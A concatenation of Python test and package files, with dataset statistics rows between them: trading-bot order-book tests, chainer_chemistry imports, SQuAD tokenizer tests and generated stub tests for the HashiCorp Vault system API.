# check if prices are from tickers
self.assertEqual(float(deal.data_row["leg1-price"]), float(deal.data_row["leg1-ob-price"]))
self.assertEqual(float(deal.data_row["leg2-price"]), float(deal.data_row["leg2-ob-price"]))
self.assertEqual(float(deal.data_row["leg3-price"]), float(deal.data_row["leg3-ob-price"]))
def test_skip_order_books_force_start_bid_and_override_depth(self):
cli = "--balance 1 --skip_order_books --force_start_bid 0.1 --override_depth_amount 0.5 offline --test -ob test_data/order_books.csv "
deal = self._run_bot_offine(cli)
self.assertEqual(0.5, float(deal.data_row["start-qty"]))
# check if prices are from tickers
self.assertEqual(float(deal.data_row["leg1-price"]), float(deal.data_row["leg1-ob-price"]))
self.assertEqual(float(deal.data_row["leg2-price"]), float(deal.data_row["leg2-ob-price"]))
self.assertEqual(float(deal.data_row["leg3-price"]), float(deal.data_row["leg3-ob-price"]))
def test_order_cancel_threshold(self):
cli = "--config _config_default_ft.json --balance 1 --skip_order_books --force_start_bid 0.1 offline --test -t test_data/tickers_threshold.csv "
deal = self._run_bot_offine(cli)
self.assertEqual(0.1, float(deal.data_row["start-qty"]))
self.assertEqual("True", deal.data_row["_config_fullthrottle"])
self.assertEqual(-0.01, float(deal.data_row["_config_cancel_price_threshold"]))
self.assertAlmostEqual(0.4, float(deal.data_row["leg1-filled"]), 4)
self.assertEqual(6, float(deal.data_row["leg1-order-updates"]))
self.assertEqual("#below_threshold", deal.data_row["leg1-tags"])
self.assertAlmostEqual(0.03774787776606954, float(deal.data_row["finish-qty"]), 6)
# check if prices are from tickers
self.assertEqual(float(deal.data_row["leg1-price"]), float(deal.data_row["leg1-ob-price"]))
self.assertEqual(float(deal.data_row["leg2-price"]), float(deal.data_row["leg2-ob-price"]))
self.assertEqual(float(deal.data_row["leg3-price"]), float(deal.data_row["leg3-ob-price"]))
"""
Test cases:
x override_depth_amount less than the amount from the order book -> should go with the amount from the order books
x override_depth_amount greater than max share of balance to bid
x skip order books
xx with override_depth_amount less than
-- with force start_amount
"""
if __name__ == '__main__':
unittest.main()
| 45.515695 | 153 | 0.680197 | 1,444 | 10,150 | 4.557479 | 0.101108 | 0.105759 | 0.145419 | 0.204224 | 0.825255 | 0.792737 | 0.772527 | 0.757028 | 0.734691 | 0.72375 | 0 | 0.03816 | 0.184138 | 10,150 | 222 | 154 | 45.720721 | 0.756551 | 0.136847 | 0 | 0.579439 | 0 | 0.018692 | 0.26263 | 0.062263 | 0 | 0 | 0 | 0.004505 | 0.523364 | 1 | 0.121495 | false | 0 | 0.037383 | 0 | 0.17757 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
093f59415ed5ef23cdc319ef5dd8d43a2cf2ecc8 | 589 | py | Python | chainer_chemistry/models/gwm/__init__.py | pfnet/chainerchem | efe323aa21f63a815130d673781e7cca1ccb72d2 | [
"MIT"
] | 184 | 2019-11-27T12:59:01.000Z | 2022-03-29T19:18:54.000Z | chainer_chemistry/models/gwm/__init__.py | pfnet/chainerchem | efe323aa21f63a815130d673781e7cca1ccb72d2 | [
"MIT"
] | 21 | 2019-12-08T01:53:33.000Z | 2020-10-23T01:19:56.000Z | chainer_chemistry/models/gwm/__init__.py | pfnet/chainerchem | efe323aa21f63a815130d673781e7cca1ccb72d2 | [
"MIT"
] | 45 | 2019-11-28T09:59:54.000Z | 2022-02-07T02:42:46.000Z | from chainer_chemistry.models.gwm import gwm # NOQA
from chainer_chemistry.models.gwm import gwm_graph_conv_model # NOQA
from chainer_chemistry.models.gwm import gwm_net # NOQA
from chainer_chemistry.models.gwm.gwm import GWM # NOQA
from chainer_chemistry.models.gwm.gwm_graph_conv_model import GWMGraphConvModel # NOQA
from chainer_chemistry.models.gwm.gwm_net import GGNN_GWM # NOQA
from chainer_chemistry.models.gwm.gwm_net import GIN_GWM # NOQA
from chainer_chemistry.models.gwm.gwm_net import NFP_GWM # NOQA
from chainer_chemistry.models.gwm.gwm_net import RSGCN_GWM # NOQA
| 53.545455 | 87 | 0.835314 | 93 | 589 | 5.032258 | 0.172043 | 0.211538 | 0.384615 | 0.5 | 0.837607 | 0.837607 | 0.837607 | 0.711538 | 0.596154 | 0.307692 | 0 | 0 | 0.108659 | 589 | 10 | 88 | 58.9 | 0.891429 | 0.074703 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 10 |
094459511af89d5c0d6d6324ee039429c3cdfd6e | 87 | py | Python | test_ci.py | SolutionUp/SolutionUP-System | 4f341df1a51a43b350e626d47abd207a55edb94d | [
"MIT"
] | 4 | 2021-08-30T01:45:46.000Z | 2022-01-08T18:05:10.000Z | test_ci.py | SolutionUp/SolutionUP-System | 4f341df1a51a43b350e626d47abd207a55edb94d | [
"MIT"
] | 6 | 2021-08-29T03:26:48.000Z | 2021-09-24T00:13:11.000Z | test_ci.py | SolutionUp/SolutionUP-System | 4f341df1a51a43b350e626d47abd207a55edb94d | [
"MIT"
] | 1 | 2021-08-16T21:21:34.000Z | 2021-08-16T21:21:34.000Z | from produtos.tests import *
from vendas.tests import *
from manutencoes.tests import * | 29 | 31 | 0.804598 | 12 | 87 | 5.833333 | 0.5 | 0.471429 | 0.428571 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.126437 | 87 | 3 | 31 | 29 | 0.921053 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
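test_ci.py works because star-importing each test module pulls its `unittest.TestCase` subclasses into the aggregator module's namespace, where the test loader finds them. A self-contained sketch of that mechanism (`DemoTest` is a hypothetical stand-in for one star-imported case):

```python
import unittest


class DemoTest(unittest.TestCase):  # stands in for a star-imported test case
    def test_addition(self):
        self.assertEqual(1 + 1, 2)


# unittest.main() would scan this module's globals the same way; here the
# loader is driven directly so the collection step is visible.
suite = unittest.TestLoader().loadTestsFromTestCase(DemoTest)
result = unittest.TextTestRunner(verbosity=0).run(suite)
print(result.testsRun, result.wasSuccessful())  # -> 1 True
```

The same applies to the `test/__init__.py` further below: as long as the names survive the star import, discovery needs no explicit suite registration.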
094ec691ae4e25d227fa49a84db96466250a6e9f | 5,499 | py | Python | src/squad/test/test_utilities.py | nptdat/qanet | d092b5484347f2f3167d162cb56eeada5c5a109e | [
"MIT"
] | 12 | 2018-12-13T16:06:26.000Z | 2020-12-07T11:39:10.000Z | src/squad/test/test_utilities.py | nptdat/qanet | d092b5484347f2f3167d162cb56eeada5c5a109e | [
"MIT"
] | null | null | null | src/squad/test/test_utilities.py | nptdat/qanet | d092b5484347f2f3167d162cb56eeada5c5a109e | [
"MIT"
] | 2 | 2019-01-10T08:42:16.000Z | 2020-08-12T07:32:20.000Z | import unittest
from utilities import prune_word_vectors, to_chars, tokenize, augment_long_text, tokenize_long_text
from config import Config as cf
class TestUtilities(unittest.TestCase):
def test_load_glove(self):
pass
def test_prune_word_vectors(self):
vocab = set({'I', 'go', 'to', 'school'})
wv = {
'I': [0, 0],
'You': [0, 0],
'to': [0, 0]
}
pruned_wv = prune_word_vectors(wv, vocab)
self.assertEqual(sorted(list(pruned_wv.keys())), ['I', 'to'])
def test_to_chars(self):
chars = to_chars(['I', 'go', 'to', 'schools'], 3, cf.PAD_CHAR)
self.assertEqual(chars, [
['I', '', ''],
['g', 'o', ''],
['t', 'o', ''],
['s', 'c', 'h']
])
def test_tokenize(self):
self.assertEqual(tokenize("What is the title of his first commercially successful work?"), ['What', 'is', 'the', 'title', 'of', 'his', 'first', 'commercially', 'successful', 'work', '?'])
self.assertEqual(tokenize("Rondo Op. 1."), ['Rondo', 'Op', '.', '1', '.'])
def test_augment_long_text(self):
context = 'Although the film received negative reviews from critics, the movie did well at the US box office, grossing $68 million—$60 million more than Cadillac Records—on a budget of $20 million. The fight scene finale between Sharon and the character played by Ali Larter also won the 2010 MTV Movie Award for Best Fight.'
answers = [
{
'text': '60 million',
'answer_start': 121
},
{
'text': 'MTV Movie Award for Best Fight',
'answer_start': 282
}
]
result = augment_long_text(context, answers)
self.assertEqual(result, 'Although the film received negative reviews from critics, the movie did well at the US box office, grossing $68 million—$ 60 million more than Cadillac Records—on a budget of $20 million. The fight scene finale between Sharon and the character played by Ali Larter also won the 2010 MTV Movie Award for Best Fight.')
def test_tokenize_long_text(self):
self.assertEqual(tokenize_long_text('aaa [n 3] abc def [web 1] xyz[n 15]'), ['aaa', '[', 'n', '3', ']', 'abc', 'def', '[', 'web', '1', ']', 'xyz', '[', 'n', '15', ']'])
self.assertEqual(tokenize_long_text("From September 1823 to 1826 Chopin attended the Warsaw Lyceum, where he received organ lessons from the Czech musician Wilhelm W\u00fcrfel during his first year. In the autumn of 1826 he began a three-year course under the Silesian composer J\u00f3zef Elsner at the Warsaw Conservatory, studying music theory, figured bass and composition.[n 3] Throughout this period he continued to compose and to give recitals in concerts and salons in Warsaw. He was engaged by the inventors of a mechanical organ, the \"eolomelodicon\", and on this instrument in May 1825 he performed his own improvisation and part of a concerto by Moscheles. The success of this concert led to an invitation to give a similar recital on the instrument before Tsar Alexander I, who was visiting Warsaw; the Tsar presented him with a diamond ring. At a subsequent eolomelodicon concert on 10 June 1825, Chopin performed his Rondo Op. 1. This was the first of his works to be commercially published and earned him his first mention in the foreign press, when the Leipzig Allgemeine Musikalische Zeitung praised his \"wealth of musical ideas\"."), ['From', 'September', '1823', 'to', '1826', 'Chopin', 'attended', 'the', 'Warsaw', 'Lyceum', ',', 'where', 'he', 'received', 'organ', 'lessons', 'from', 'the', 'Czech', 'musician', 'Wilhelm', 'Würfel', 'during', 'his', 'first', 'year', '.', 'In', 'the', 'autumn', 'of', '1826', 'he', 'began', 'a', 'three', '-', 'year', 'course', 'under', 'the', 'Silesian', 'composer', 'Józef', 'Elsner', 'at', 'the', 'Warsaw', 'Conservatory', ',', 'studying', 'music', 'theory', ',', 'figured', 'bass', 'and', 'composition', '.', '[', 'n', '3', ']', 'Throughout', 'this', 'period', 'he', 'continued', 'to', 'compose', 'and', 'to', 'give', 'recitals', 'in', 'concerts', 'and', 'salons', 'in', 'Warsaw', '.', 'He', 'was', 'engaged', 'by', 'the', 'inventors', 'of', 'a', 'mechanical', 'organ', ',', 'the', '"', 'eolomelodicon', '"', ',', 'and', 'on', 'this', 
'instrument', 'in', 'May', '1825', 'he', 'performed', 'his', 'own', 'improvisation', 'and', 'part', 'of', 'a', 'concerto', 'by', 'Moscheles', '.', 'The', 'success', 'of', 'this', 'concert', 'led', 'to', 'an', 'invitation', 'to', 'give', 'a', 'similar', 'recital', 'on', 'the', 'instrument', 'before', 'Tsar', 'Alexander', 'I', ',', 'who', 'was', 'visiting', 'Warsaw', ';', 'the', 'Tsar', 'presented', 'him', 'with', 'a', 'diamond', 'ring', '.', 'At', 'a', 'subsequent', 'eolomelodicon', 'concert', 'on', '10', 'June', '1825', ',', 'Chopin', 'performed', 'his', 'Rondo', 'Op', '.', '1', '.', 'This', 'was', 'the', 'first', 'of', 'his', 'works', 'to', 'be', 'commercially', 'published', 'and', 'earned', 'him', 'his', 'first', 'mention', 'in', 'the', 'foreign', 'press', ',', 'when', 'the', 'Leipzig', 'Allgemeine', 'Musikalische', 'Zeitung', 'praised', 'his', '"', 'wealth', 'of', 'musical', 'ideas', '"', '.'])
self.assertEqual(tokenize_long_text('The GameCube version was released worldwide in December 2006.[b]'), ['The', 'GameCube', 'version', 'was', 'released', 'worldwide', 'in', 'December', '2006', '.', '[', 'b', ']'])
| 101.833333 | 2,913 | 0.607747 | 712 | 5,499 | 4.647472 | 0.311798 | 0.019341 | 0.024176 | 0.014506 | 0.797824 | 0.769719 | 0.762164 | 0.762164 | 0.762164 | 0.762164 | 0 | 0.023895 | 0.193308 | 5,499 | 53 | 2,914 | 103.754717 | 0.721145 | 0 | 0 | 0 | 0 | 0.090909 | 0.553373 | 0 | 0 | 0 | 0 | 0 | 0.181818 | 1 | 0.136364 | false | 0.022727 | 0.068182 | 0 | 0.227273 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
117a60e8e82e7a7438ccd9bb3bfed8e7b70e9f1a | 110 | py | Python | test/__init__.py | jmarrec/IDFVersionUpdater2 | 0420732141e41bdc06c85f1372d82f0843f8cebf | [
"BSD-3-Clause"
] | null | null | null | test/__init__.py | jmarrec/IDFVersionUpdater2 | 0420732141e41bdc06c85f1372d82f0843f8cebf | [
"BSD-3-Clause"
] | null | null | null | test/__init__.py | jmarrec/IDFVersionUpdater2 | 0420732141e41bdc06c85f1372d82f0843f8cebf | [
"BSD-3-Clause"
] | 2 | 2020-09-25T08:02:39.000Z | 2021-08-18T08:30:31.000Z | from test_EnergyPlusPath import *
from test_TransitionBinary import *
from test_VersionUpdaterWindow import *
| 27.5 | 39 | 0.863636 | 12 | 110 | 7.666667 | 0.5 | 0.26087 | 0.304348 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.109091 | 110 | 3 | 40 | 36.666667 | 0.938776 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
11946451f8983015037cf5f2e67962678e2acd67 | 34,530 | py | Python | hashicorp_vault_client/test/test_system_api.py | drewmullen/HAC | fb185804fd244366f8f8d01df22835b3d96e7512 | [
"Apache-2.0"
] | null | null | null | hashicorp_vault_client/test/test_system_api.py | drewmullen/HAC | fb185804fd244366f8f8d01df22835b3d96e7512 | [
"Apache-2.0"
] | 2 | 2019-09-30T20:56:41.000Z | 2019-10-02T00:22:07.000Z | hashicorp_vault_client/test/test_system_api.py | drewmullen/HAC | fb185804fd244366f8f8d01df22835b3d96e7512 | [
"Apache-2.0"
] | null | null | null | # coding: utf-8
"""
HashiCorp Vault API
HTTP API that gives you full access to Vault. All API routes are prefixed with `/v1/`. # noqa: E501
OpenAPI spec version: 1.2.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import hashicorp_vault_client
from hashicorp_vault_client.api.system_api import SystemApi  # noqa: E501
from hashicorp_vault_client.rest import ApiException
class TestSystemApi(unittest.TestCase):
"""SystemApi unit test stubs"""
def setUp(self):
self.api = SystemApi()  # noqa: E501
def tearDown(self):
pass
def test_delete_sys_audit_path(self):
"""Test case for delete_sys_audit_path
Disable the audit device at the given path. # noqa: E501
"""
pass
def test_delete_sys_auth_path(self):
"""Test case for delete_sys_auth_path
Disable the auth method at the given auth path # noqa: E501
"""
pass
def test_delete_sys_config_auditing_request_headers_header(self):
"""Test case for delete_sys_config_auditing_request_headers_header
Disable auditing of the given request header. # noqa: E501
"""
pass
def test_delete_sys_config_control_group(self):
"""Test case for delete_sys_config_control_group
Configure control group global settings. # noqa: E501
"""
pass
def test_delete_sys_config_cors(self):
"""Test case for delete_sys_config_cors
Remove any CORS settings. # noqa: E501
"""
pass
def test_delete_sys_config_ui_headers_header(self):
"""Test case for delete_sys_config_ui_headers_header
Remove a UI header. # noqa: E501
"""
pass
def test_delete_sys_generate_root(self):
"""Test case for delete_sys_generate_root
Cancels any in-progress root generation attempt. # noqa: E501
"""
pass
def test_delete_sys_generate_root_attempt(self):
"""Test case for delete_sys_generate_root_attempt
Cancels any in-progress root generation attempt. # noqa: E501
"""
pass
def test_delete_sys_mfa_method_duo_name(self):
"""Test case for delete_sys_mfa_method_duo_name
Defines or updates a Duo MFA method. # noqa: E501
"""
pass
def test_delete_sys_mfa_method_okta_name(self):
"""Test case for delete_sys_mfa_method_okta_name
Defines or updates an Okta MFA method. # noqa: E501
"""
pass
def test_delete_sys_mfa_method_pingid_name(self):
"""Test case for delete_sys_mfa_method_pingid_name
Defines or updates a PingID MFA method. # noqa: E501
"""
pass
def test_delete_sys_mfa_method_totp_name(self):
"""Test case for delete_sys_mfa_method_totp_name
Defines or updates a TOTP MFA method. # noqa: E501
"""
pass
def test_delete_sys_mounts_path(self):
"""Test case for delete_sys_mounts_path
Disable the mount point specified at the given path. # noqa: E501
"""
pass
def test_delete_sys_namespaces_path(self):
"""Test case for delete_sys_namespaces_path
"""
pass
def test_delete_sys_plugins_catalog_name(self):
"""Test case for delete_sys_plugins_catalog_name
Remove the plugin with the given name. # noqa: E501
"""
pass
def test_delete_sys_plugins_catalog_type_name(self):
"""Test case for delete_sys_plugins_catalog_type_name
Remove the plugin with the given name. # noqa: E501
"""
pass
def test_delete_sys_policies_acl_name(self):
"""Test case for delete_sys_policies_acl_name
Delete the ACL policy with the given name. # noqa: E501
"""
pass
def test_delete_sys_policies_egp_name(self):
"""Test case for delete_sys_policies_egp_name
Read, Modify, or Delete an access control policy. # noqa: E501
"""
pass
def test_delete_sys_policies_rgp_name(self):
"""Test case for delete_sys_policies_rgp_name
Read, Modify, or Delete an access control policy. # noqa: E501
"""
pass
def test_delete_sys_policy_name(self):
"""Test case for delete_sys_policy_name
Delete the policy with the given name. # noqa: E501
"""
pass
def test_delete_sys_rekey_backup(self):
"""Test case for delete_sys_rekey_backup
Delete the backup copy of PGP-encrypted unseal keys. # noqa: E501
"""
pass
def test_delete_sys_rekey_init(self):
"""Test case for delete_sys_rekey_init
Cancels any in-progress rekey. # noqa: E501
"""
pass
def test_delete_sys_rekey_recovery_key_backup(self):
"""Test case for delete_sys_rekey_recovery_key_backup
Allows fetching or deleting the backup of the rotated unseal keys. # noqa: E501
"""
pass
def test_delete_sys_rekey_verify(self):
"""Test case for delete_sys_rekey_verify
Cancel any in-progress rekey verification operation. # noqa: E501
"""
pass
def test_delete_sys_replication_performance_primary_mount_filter_id(self):
"""Test case for delete_sys_replication_performance_primary_mount_filter_id
"""
pass
def test_get_sys_audit(self):
"""Test case for get_sys_audit
List the enabled audit devices. # noqa: E501
"""
pass
def test_get_sys_auth(self):
"""Test case for get_sys_auth
List the currently enabled credential backends. # noqa: E501
"""
pass
def test_get_sys_auth_path_tune(self):
"""Test case for get_sys_auth_path_tune
Reads the given auth path's configuration. # noqa: E501
"""
pass
def test_get_sys_config_auditing_request_headers(self):
"""Test case for get_sys_config_auditing_request_headers
List the request headers that are configured to be audited. # noqa: E501
"""
pass
def test_get_sys_config_auditing_request_headers_header(self):
"""Test case for get_sys_config_auditing_request_headers_header
List the information for the given request header. # noqa: E501
"""
pass
def test_get_sys_config_control_group(self):
"""Test case for get_sys_config_control_group
Configure control group global settings. # noqa: E501
"""
pass
def test_get_sys_config_cors(self):
"""Test case for get_sys_config_cors
Return the current CORS settings. # noqa: E501
"""
pass
def test_get_sys_config_ui_headers(self):
"""Test case for get_sys_config_ui_headers
Return a list of configured UI headers. # noqa: E501
"""
pass
def test_get_sys_config_ui_headers_header(self):
"""Test case for get_sys_config_ui_headers_header
Return the given UI header's configuration # noqa: E501
"""
pass
def test_get_sys_generate_root(self):
"""Test case for get_sys_generate_root
Read the configuration and progress of the current root generation attempt. # noqa: E501
"""
pass
def test_get_sys_generate_root_attempt(self):
"""Test case for get_sys_generate_root_attempt
Read the configuration and progress of the current root generation attempt. # noqa: E501
"""
pass
def test_get_sys_health(self):
"""Test case for get_sys_health
Returns the health status of Vault. # noqa: E501
"""
pass
def test_get_sys_init(self):
"""Test case for get_sys_init
Returns the initialization status of Vault. # noqa: E501
"""
pass
def test_get_sys_internal_specs_openapi(self):
"""Test case for get_sys_internal_specs_openapi
Generate an OpenAPI 3 document of all mounted paths. # noqa: E501
"""
pass
def test_get_sys_internal_ui_mounts(self):
"""Test case for get_sys_internal_ui_mounts
Lists all enabled and visible auth and secrets mounts. # noqa: E501
"""
pass
def test_get_sys_internal_ui_mounts_path(self):
"""Test case for get_sys_internal_ui_mounts_path
Return information about the given mount. # noqa: E501
"""
pass
def test_get_sys_key_status(self):
"""Test case for get_sys_key_status
Provides information about the backend encryption key. # noqa: E501
"""
pass
def test_get_sys_leader(self):
"""Test case for get_sys_leader
Returns the high availability status and current leader instance of Vault. # noqa: E501
"""
pass
def test_get_sys_leases_lookup(self):
"""Test case for get_sys_leases_lookup
Returns a list of lease ids. # noqa: E501
"""
pass
def test_get_sys_leases_lookup_prefix(self):
"""Test case for get_sys_leases_lookup_prefix
Returns a list of lease ids. # noqa: E501
"""
pass
def test_get_sys_license(self):
"""Test case for get_sys_license
The path responds to the following HTTP methods. GET / Returns information on the installed license POST Sets the license for the server # noqa: E501
"""
pass
def test_get_sys_metrics(self):
"""Test case for get_sys_metrics
Export the metrics aggregated for telemetry purpose. # noqa: E501
"""
pass
def test_get_sys_mfa_method(self):
"""Test case for get_sys_mfa_method
Lists all the available MFA methods by their name. # noqa: E501
"""
pass
def test_get_sys_mfa_method_duo_name(self):
"""Test case for get_sys_mfa_method_duo_name
Defines or updates a Duo MFA method. # noqa: E501
"""
pass
def test_get_sys_mfa_method_okta_name(self):
"""Test case for get_sys_mfa_method_okta_name
Defines or updates an Okta MFA method. # noqa: E501
"""
pass
def test_get_sys_mfa_method_pingid_name(self):
"""Test case for get_sys_mfa_method_pingid_name
Defines or updates a PingID MFA method. # noqa: E501
"""
pass
def test_get_sys_mfa_method_totp_name(self):
"""Test case for get_sys_mfa_method_totp_name
Defines or updates a TOTP MFA method. # noqa: E501
"""
pass
def test_get_sys_mfa_method_totp_name_generate(self):
"""Test case for get_sys_mfa_method_totp_name_generate
Generates a TOTP secret for the given method name on the entity of the calling token. # noqa: E501
"""
pass
def test_get_sys_mounts(self):
"""Test case for get_sys_mounts
List the currently mounted backends. # noqa: E501
"""
pass
def test_get_sys_mounts_path_tune(self):
"""Test case for get_sys_mounts_path_tune
Tune backend configuration parameters for this mount. # noqa: E501
"""
pass
def test_get_sys_namespaces(self):
"""Test case for get_sys_namespaces
"""
pass
def test_get_sys_namespaces_path(self):
"""Test case for get_sys_namespaces_path
"""
pass
def test_get_sys_plugins_catalog(self):
"""Test case for get_sys_plugins_catalog
Lists all the plugins known to Vault # noqa: E501
"""
pass
def test_get_sys_plugins_catalog_name(self):
"""Test case for get_sys_plugins_catalog_name
Return the configuration data for the plugin with the given name. # noqa: E501
"""
pass
def test_get_sys_plugins_catalog_type(self):
"""Test case for get_sys_plugins_catalog_type
List the plugins in the catalog. # noqa: E501
"""
pass
def test_get_sys_plugins_catalog_type_name(self):
"""Test case for get_sys_plugins_catalog_type_name
Return the configuration data for the plugin with the given name. # noqa: E501
"""
pass
def test_get_sys_policies_acl(self):
"""Test case for get_sys_policies_acl
List the configured access control policies. # noqa: E501
"""
pass
def test_get_sys_policies_acl_name(self):
"""Test case for get_sys_policies_acl_name
Retrieve information about the named ACL policy. # noqa: E501
"""
pass
def test_get_sys_policies_egp(self):
"""Test case for get_sys_policies_egp
List the configured access control policies. # noqa: E501
"""
pass
def test_get_sys_policies_egp_name(self):
"""Test case for get_sys_policies_egp_name
Read, Modify, or Delete an access control policy. # noqa: E501
"""
pass
def test_get_sys_policies_rgp(self):
"""Test case for get_sys_policies_rgp
List the configured access control policies. # noqa: E501
"""
pass
def test_get_sys_policies_rgp_name(self):
"""Test case for get_sys_policies_rgp_name
Read, Modify, or Delete an access control policy. # noqa: E501
"""
pass
def test_get_sys_policy(self):
"""Test case for get_sys_policy
List the configured access control policies. # noqa: E501
"""
pass
def test_get_sys_policy_name(self):
"""Test case for get_sys_policy_name
Retrieve the policy body for the named policy. # noqa: E501
"""
pass
def test_get_sys_rekey_backup(self):
"""Test case for get_sys_rekey_backup
Return the backup copy of PGP-encrypted unseal keys. # noqa: E501
"""
pass
def test_get_sys_rekey_init(self):
"""Test case for get_sys_rekey_init
Reads the configuration and progress of the current rekey attempt. # noqa: E501
"""
pass
def test_get_sys_rekey_recovery_key_backup(self):
"""Test case for get_sys_rekey_recovery_key_backup
Allows fetching or deleting the backup of the rotated unseal keys. # noqa: E501
"""
pass
def test_get_sys_rekey_verify(self):
"""Test case for get_sys_rekey_verify
Read the configuration and progress of the current rekey verification attempt. # noqa: E501
"""
pass
def test_get_sys_replication_dr_secondary_license(self):
"""Test case for get_sys_replication_dr_secondary_license
The path responds to the following HTTP methods. GET / Returns information on the installed license POST Sets the license for the server # noqa: E501
"""
pass
def test_get_sys_replication_dr_status(self):
"""Test case for get_sys_replication_dr_status
"""
pass
def test_get_sys_replication_performance_primary_mount_filter_id(self):
"""Test case for get_sys_replication_performance_primary_mount_filter_id
"""
pass
def test_get_sys_replication_performance_status(self):
"""Test case for get_sys_replication_performance_status
"""
pass
def test_get_sys_replication_status(self):
"""Test case for get_sys_replication_status
"""
pass
def test_get_sys_seal_status(self):
"""Test case for get_sys_seal_status
Check the seal status of a Vault. # noqa: E501
"""
pass
def test_get_sys_wrapping_lookup(self):
"""Test case for get_sys_wrapping_lookup
Look up wrapping properties for the requester's token. # noqa: E501
"""
pass
def test_post_sys_audit_hash_path(self):
"""Test case for post_sys_audit_hash_path
The hash of the given string via the given audit backend # noqa: E501
"""
pass
def test_post_sys_audit_path(self):
"""Test case for post_sys_audit_path
Enable a new audit device at the supplied path. # noqa: E501
"""
pass
def test_post_sys_auth_path(self):
"""Test case for post_sys_auth_path
Enables a new auth method. # noqa: E501
"""
pass
def test_post_sys_auth_path_tune(self):
"""Test case for post_sys_auth_path_tune
Tune configuration parameters for a given auth path. # noqa: E501
"""
pass
def test_post_sys_capabilities(self):
"""Test case for post_sys_capabilities
Fetches the capabilities of the given token on the given path. # noqa: E501
"""
pass
def test_post_sys_capabilities_accessor(self):
"""Test case for post_sys_capabilities_accessor
Fetches the capabilities of the token associated with the given token, on the given path. # noqa: E501
"""
pass
def test_post_sys_capabilities_self(self):
"""Test case for post_sys_capabilities_self
Fetches the capabilities of the given token on the given path. # noqa: E501
"""
pass
def test_post_sys_config_auditing_request_headers_header(self):
"""Test case for post_sys_config_auditing_request_headers_header
Enable auditing of a header. # noqa: E501
"""
pass
def test_post_sys_config_control_group(self):
"""Test case for post_sys_config_control_group
Configure control group global settings. # noqa: E501
"""
pass
def test_post_sys_config_cors(self):
"""Test case for post_sys_config_cors
Configure the CORS settings. # noqa: E501
"""
pass
def test_post_sys_config_ui_headers_header(self):
"""Test case for post_sys_config_ui_headers_header
Configure the values to be returned for the UI header. # noqa: E501
"""
pass
def test_post_sys_control_group_authorize(self):
"""Test case for post_sys_control_group_authorize
Authorize a control group request # noqa: E501
"""
pass
def test_post_sys_control_group_request(self):
"""Test case for post_sys_control_group_request
Check the status of a control group request # noqa: E501
"""
pass
def test_post_sys_generate_root(self):
"""Test case for post_sys_generate_root
Initializes a new root generation attempt. # noqa: E501
"""
pass
def test_post_sys_generate_root_attempt(self):
"""Test case for post_sys_generate_root_attempt
Initializes a new root generation attempt. # noqa: E501
"""
pass
def test_post_sys_generate_root_update(self):
"""Test case for post_sys_generate_root_update
Enter a single master key share to progress the root generation attempt. # noqa: E501
"""
pass
def test_post_sys_init(self):
"""Test case for post_sys_init
Initialize a new Vault. # noqa: E501
"""
pass
def test_post_sys_leases_lookup(self):
"""Test case for post_sys_leases_lookup
Retrieve lease metadata. # noqa: E501
"""
pass
def test_post_sys_leases_renew(self):
"""Test case for post_sys_leases_renew
Renews a lease, requesting to extend the lease. # noqa: E501
"""
pass
def test_post_sys_leases_renew_url_lease_id(self):
"""Test case for post_sys_leases_renew_url_lease_id
Renews a lease, requesting to extend the lease. # noqa: E501
"""
pass
def test_post_sys_leases_revoke(self):
"""Test case for post_sys_leases_revoke
Revokes a lease immediately. # noqa: E501
"""
pass
def test_post_sys_leases_revoke_force_prefix(self):
"""Test case for post_sys_leases_revoke_force_prefix
Revokes all secrets or tokens generated under a given prefix immediately # noqa: E501
"""
pass
def test_post_sys_leases_revoke_prefix_prefix(self):
"""Test case for post_sys_leases_revoke_prefix_prefix
Revokes all secrets (via a lease ID prefix) or tokens (via the tokens' path property) generated under a given prefix immediately. # noqa: E501
"""
pass
def test_post_sys_leases_revoke_url_lease_id(self):
"""Test case for post_sys_leases_revoke_url_lease_id
Revokes a lease immediately. # noqa: E501
"""
pass
def test_post_sys_leases_tidy(self):
"""Test case for post_sys_leases_tidy
This endpoint performs cleanup tasks that can be run if certain error conditions have occurred. # noqa: E501
"""
pass
def test_post_sys_license(self):
"""Test case for post_sys_license
The path responds to the following HTTP methods. GET / Returns information on the installed license POST Sets the license for the server # noqa: E501
"""
pass
